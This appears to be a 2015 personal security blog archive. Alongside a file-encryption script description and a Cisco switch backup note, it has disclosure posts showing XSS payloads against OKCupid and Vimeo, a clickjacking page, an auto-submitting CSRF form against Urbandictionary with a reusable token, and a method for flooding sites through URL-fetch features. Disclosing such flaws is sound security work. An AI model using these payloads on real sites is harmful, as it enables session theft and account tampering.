Sunday, 29 November 2015

Encrypt files with Ruby and OpenSSL

I created this script to make my life easier encrypting files. Google drive, drop box or any other cloud platform don't have an option to password protect or encrypt your files. With this ruby script you will be able to encrypt individual files with a password. It encrypts one file at a time, but if you want a bunch of them you can zip them and encrypt the zip file.
Note: It doesn't use the OpenSSL ruby library, it requires OpenSSL to be installed on your system, it comes by default on Linux, hasn't be tested on Windows

Here's how it works:

Let's say we have the text file below that we want to encrypt.

To Encrypt:
  1. We simply run the ruby script first 
  2. Type 1 to encrypt
  3. Type the file name, if the file is under different folder you can type the full path, e.g. /opt/testing/test.txt
  4. Enter a password, (it won't be visible as you type it), and then re enter it.
  5. And that's it, it will create a file under the same path with the extension .des3


To Decrypt:

It's the same process as the encryption, you just need to select option 2 and the file name will have to include the .des3. The output name will be the same excluding .des3, so make sure a file with the same name doesn't exist in that path.


the Script:

Wednesday, 16 September 2015

OKCupid.com Security holes

1) Stored XSS

In their blog at the comment section you could store XSS, and any user/admin who visited that blog post would get XSSed..
The POC: Input break, insert a non existent image and on error it pops up our script to steal session cookies etc...
“><img src=x onerror=prompt(1);>

 2) ClickJacking

POC:
<html>
  <head>
    <title>Clickjack test page</title>
  </head>
  <body>
  <style>
   iframe { 
     top:0; left:0;
     filter:alpha(opacity=50); /* in real life opacity=0 */
     opacity:1;
    }
  </style>
  <p>You've been clickjacked!</p>
    <iframe sandbox="allow-scripts allow-forms" src="http://okcupid.com
       style="width:100%;height:90%">
    </iframe>
  </body
</html>

what is clickjacking: www.owasp.org/index.php/Clickjacking 

Friday, 20 March 2015

CSRF on Urbandictionary.com, Persistent Token


Urbandictionary is vulnerable to CSRF attacks on every POST request throughout their website.
An attacker can change a user's personal details, vote for them, logout and so on...
In most of the POST requests an authenticity token is required in order to be processed. That's a good defense mechanism unless you can reuse the same token even after logging out and in again...

authenticity_token

On Urbandictionary you can use the same token as many times as you want, so all we need to do is include it in our CSRF attack (It can be done both by POST and GET requests):
<body onload=document.getElementById('csrf').submit()>
<form id="csrf" action="http://www.urbandictionary.com/game.save.php">
<input type="hidden" name="id" value="1204725">
<input type="hidden" name="response" value="1">
<input type="hidden" name="authenticity_token" value="Pubso039ovSL7lFWltxMKJjWbIVF8%2FylhzQKsHbWezM%3D">
</form>
The whole website was vulnerable to this attack, and on some forms the authenticity token was not included at all.

Tuesday, 27 January 2015

GET request Flooding, Websites as a proxy

This is a controversial vulnerability that some websites consider it as a valid one and others that don't bother much about it.

Many websites have an option to fetch images from an external URL, or post a comment with a link, resulting a real time loading of the title and description, these are the most common examples. In both of these examples a get request is made to the third party website, not from your pc but from the originating website.

What if we customize the get request and repeat it couple of hundred times?
Let's take the example below to demonstrate this scenario:

We first find an input that requests a URL from a third party website, and we modify the input to any get request we like.


When you press the import button the get request is going to be sent. We can then capture the data being transmitted in order to repeat this process.


Most of websites don't allow the same request being sent more than once, that's why we have to change the value on every request. We can achieve that with many different ways, in my case i created a small PHP CURL script that can do that for you.
We copy all the previously captured data and paste them in our script for the flooding process.

If the attacker has a botnet, he can generate this request multiple times from different locations targeting a single website, and the victim's website will log the IP addresses from the originating website, allowing the attacker to obfuscate their attack a step further by using a website as a proxy..


Tuesday, 13 January 2015

XSS on Vimeo

http://developer.vimeo.com had a flaw in one of their inputs.

Here is how it works:

They have an input where you can add a url and it will fetch an image from anywhere and display it as a logo for your app:


Apart from the XSS, they weren't filtering to accept only image links.

The poc XSS:

http://alex.avlonitis.me/images/face.png' onmouseover="onmouseover="alert(document.domain)"

The input break:



Saturday, 10 January 2015

Xss in hidden input. Possible?

While I was trying to find a way to exploit a vulnerable html hidden input on a famous website (the < > were sanitised). I have gathered some information trying many different techniques that might help on different website.
The vulnerable input looks something like this:

<input id='myInput' type='hidden' value='dynamic'/> 

It could break with a single quote ' onmousover="alert(1)" . And that would become:

<input id='myInput' type='hidden' value='dynamic' onmouseover="alert(1)" />

Unfortunately even if we break the input with onmouseover nothing happens because there is nothing visible in our page to hover. And neither all of the other attributes worked including onchange.

Can we overwrite the Type field by rewriting type="text"?
No that's not possible any more.

What if we style it inline with css and make it visible with the examples below:
style="display: block;width: 999px;height: 999px;"
style="display: inline;width: 999px;height: 999px;"
style="visibility: visible;"
None of that worked in this case as the CSS couldn't overwrite the html attribute.

Maybe try to fire up javascript within css:
style = width: expression(alert('xss'));"
style="-moz-binding:url('http://ha.ckers/xss.js');
No luck...

Haven't found a way to bypass this yet.

sources:
owasp.org
sla.ckers.org



Sunday, 4 January 2015

Automated Backup of Cisco switches

Created a small script to auto-backup cisco switches on the network using Perl, it connects to ssh and telnet configured switches.

Libraries you will need: Net:SSH2, Net::Telnet::Cisco